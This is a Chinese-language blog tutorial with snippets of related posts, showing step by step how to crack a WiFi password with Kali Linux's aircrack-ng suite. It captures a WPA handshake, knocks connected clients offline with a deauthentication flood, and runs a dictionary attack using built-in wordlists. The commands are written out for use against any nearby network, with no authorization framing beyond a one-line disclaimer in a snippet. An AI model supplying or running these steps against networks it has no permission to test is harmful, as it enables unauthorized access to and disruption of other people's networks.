kali掃瞄不到wifi 破解WIFI詳細教程

2021-10-11 13:47:31 字數 2104 閱讀 4343

準備工具

•筆記本一台

•usb無線網絡卡【我用的是小公尺的】

•kali系統【可以在虛擬機器裡裝,建議用2023年及以下版本

vmware workstation15虛擬機器安裝

可以參考

kali安裝

可以參考

wifi加密方式

1. wep(有線等效加密)——採用wep64位或者128位資料加密。

2.wpa-psk[tkip]———採用預共享秘鑰的wi-fi保護訪問,採用wpa-psk標準加密技術,加密型別為tkip。

3.wpa-psk[tkip]+wpa2-psk[aes]———允許客戶端使用wpa-psk[tkip]或者wpa2-psk[aes]。

start

一開啟虛擬機器,插入usb網絡卡,把網絡卡放到虛擬機器來

桌面右鍵,選擇open in terminal開啟終端

二顯示網絡卡資訊

開啟網絡卡監控

用ifconfig命令檢視一下網絡卡資訊

ifconfig

可以看到網絡卡的名字已經變了

三掃瞄wifi訊號

airodump-ng wlan0mon

拿到握手包

airodump-ng -w freedom -c 11 -–bssid 44:97:5a:f2:9e:b0 wlan0mon --ignore-negative-one

解釋:-c:指定通道[ch]

-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字

--bssid:指定路由器的mac

再開乙個終端輸入命令

aireplay-ng -0 10 -a 路由器mac -c 客戶機mac wlan0mon – -ignore-negative-one

使用airplay-ng工具強制斷開已經連線到wifi的裝置重新連線路由器,來進行抓去資料報

解釋:-0:指定傳送反認證包的個數(阿利伯數字0)

-a:指定路由器的mac

-c:指定客戶機的mac

出現下圖就是抓取成功

破解握手包

aircrack-ng -w dict freedom-*.cap

dict:字典的名字

freedom-*.cap:握手包

破解成功

補充•系統自帶了密碼字典,我用的是我自己的

字典位置如下:

/usr/share/john/password.lst

/usr/share/wfuzz/wordlist

/usr/share/ wordlists/rockyou.txt

最後乙個路徑下的檔案預設是壓縮的,可以通過以下命令解壓

•反向認證的原理是讓其中乙個客戶端下線,然後他再次連線,就可以獲取握手包•訊號掃瞄結束或者程序終止:ctrl+c

kali破解WIFI密碼

今天我們來學習一下通過kali和乙個好的字典來破解wifi密碼。宣告 此教程僅供學習研究使用,嚴禁使用此技術進行非法行為 首先我們需要乙個具有監聽功能的無線網絡卡 這裡我給大家推薦 rt3070 本章實驗通過虛擬機器vmware進行 先通過services.msc來開啟vmware usb arbi...

kali破解wifi密碼

開始 1 選擇合適的網絡卡,有些網絡卡kali識別不了,我用的網絡卡資訊 2 網絡卡開啟監聽模式 3 檢視監聽模式是否開啟成功 網絡卡名稱變成wlan0mon說明已經開啟成功 5 抓取握手包。命令格式 airodump ng c bssid w 輸入 airodump ng c 11 bssid 3...

kali無線wifi密碼破解

kali linux主要以滲透測試及 破解wifi密碼 聞名。裝置要求 這種攻擊需要字典檔案,乙個好的字典至關重要。我以kali linux自帶的rockyou字典為例,位於 user share wordlists rockyou.txt.gz。使用前先解壓 gzip d usr share wo...